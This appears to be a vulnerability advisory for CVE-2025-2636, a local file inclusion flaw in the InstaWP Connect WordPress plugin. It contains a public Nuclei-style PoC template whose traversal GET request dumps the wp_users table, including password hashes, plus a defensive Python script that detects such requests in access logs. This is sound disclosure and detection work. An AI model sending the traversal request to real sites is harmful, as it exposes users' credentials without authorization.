The InstaWP Connect - 1-click WP Staging & Migration plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 0.1.0.85 via the 'instawp-database-manager' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files.
PoC code [public]
id: CVE-2025-2636

info:
  name: InstaWP Connect < 0.1.0.86 - Local PHP File Inclusion
  author: iamnoooob,pdresearch
  severity: high
  description: |
    The InstaWP Connect - 1-click WP Staging & Migration plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 0.1.0.85 via the 'instawp-database-manager' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files.
  remediation: |
    Update InstaWP Connect plugin to version 0.1.0.86 or later.
  reference:
    - https://wpscan.com/vulnerability/d1b64725-d4ae-4d73-950a-b772a877022b/
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/4c8f2c6f-c231-477c-895b-df892569ef95
    - https://nvd.nist.gov/vuln/detail/CVE-2025-2636
  classification:
    epss-score: 0.13543
    epss-percentile: 0.93966
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-2636
    cwe-id: CWE-22
  metadata:
    max-request: 1
    verified: true
    fofa-query: body="/wp-content/plugins/instawp-connect"
  tags: cve,cve2025,wp,wordpress,wp-plugin,instawp-connect,lfi,vkev,vuln

http:
  - raw:
      - |
        GET /?instawp-database-manager=/../../../%2e%2fmigrate%2ftemplates%2fdebug%2fdb-table&table_name=wp_users--%20- HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'instawp-wrap'
          - 'user_pass</th>'
          - 'user_email</th>'
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402200cbc0552c660b66b941494fab2336935ea38988d17e52a707b4e9fadb2044b0902203caa8a913e68b689b4185ed95dc62727847702fe9aec6468287aa704a250755c:922c64590222798bb761d5b6d8e72950
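For defenders who want to find exploitation attempts in web server logs, the following is an added example (not part of the advisory or the template above) that scans Apache combined-format access-log lines for the 'instawp-database-manager' parameter and flags values that traverse the filesystem, decoding percent-encoding repeatedly so the '%2e%2f' and double-encoded variants are caught. The log lines, IP addresses and user agents are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (Apache combined format), not real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Apr/2025:12:00:01 +0000] "GET /?instawp-database-manager=/../../../%2e%2fmigrate%2ftemplates%2fdebug%2fdb-table&table_name=wp_users--%20- HTTP/1.1" 200 5120 "-" "curl/8.0"
198.51.100.7 - - [10/Apr/2025:12:00:02 +0000] "GET /?instawp-database-manager=..%252f..%252fmigrate%252ftemplates%252fdebug%252fdb-table HTTP/1.1" 500 310 "-" "python-requests/2.31"
192.0.2.5 - - [10/Apr/2025:12:00:03 +0000] "GET /wp-content/plugins/instawp-connect/assets/app.css HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
192.0.2.6 - - [10/Apr/2025:12:00:04 +0000] "GET /?p=12 HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

PARAM = "instawp-database-manager"  # vulnerable parameter named in the advisory
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until stable so double-encoded '..%252f' is also caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(value: str) -> bool:
    """True if the decoded value walks the filesystem ('..' or a path separator)."""
    v = fully_decode(value).replace("\\", "/")
    return ".." in v or "/" in v

def find_lfi_attempts(log_text: str) -> list:
    """Return one finding per request that carries the vulnerable parameter."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a well-formed combined-format line
        query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        for value in query.get(PARAM, []):
            findings.append({
                "ip": m["ip"],
                "status": int(m["status"]),  # a 200 here warrants a response-body review
                "value": fully_decode(value),
                "traversal": is_traversal(value),
            })
    return findings

if __name__ == "__main__":
    for finding in find_lfi_attempts(SAMPLE_LOG):
        print(finding)
```

A 200 response to a flagged request is the strongest signal, since the template above matches on the rendered users table in the body; a 500 still records an attempt worth correlating with the source address.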